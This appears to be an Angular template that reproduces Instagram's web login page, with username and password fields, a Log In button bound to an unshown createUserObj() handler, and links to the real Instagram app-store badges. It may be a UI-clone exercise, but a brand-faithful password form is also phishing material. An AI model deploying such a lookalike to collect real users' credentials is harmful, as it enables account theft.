<!-- Latest compiled and minified CSS -->
<div id="container wrapper">
  <div class="main-content ">
    <div class="header">
      <img src="https://i.imgur.com/zqpwkLQ.png" />
    </div>
    <div class="l-part">
      <input type="text" placeholder="Username or Email" #instaHandle class="input-1" />
      <div >
        <input type="password" placeholder="Password" #password class="input-2" />
      </div>
      <input type="button" (click)="createUserObj()" value="Log In" class="btn"/>
      <div class="overlap-text">
      <a href="#">Forgot Password?</a>
    </div>
</div>
  </div>
  <div class="sub-content">
    <div class="s-part">
      &nbsp;Don't&nbsp;have&nbsp;an&nbsp;account?&nbsp;  <a routerLink="/signup"> &nbsp;Sign&nbsp;up&nbsp;</a>
    </div>
  </div>
</div>

<div class="app">
  <p>Get the app.</p>
  <div class="app-img">
    <a href="https://itunes.apple.com/app/instagram/id389801252?pt=428156&amp;ct=igweb.loginPage.badge&amp;mt=8">
      <img src="https://www.instagram.com/static/images/appstore-install-badges/badge_ios_english-en.png/4b70f6fae447.png" >
    </a>
    <a href="https://play.google.com/store/apps/details?id=com.instagram.android&amp;referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26utm_medium%3Dbadge">
      <img src="https://www.instagram.com/static/images/appstore-install-badges/badge_android_english-en.png/f06b908907d5.png">
    </a>  
  </div>  <!-- App-img end-->
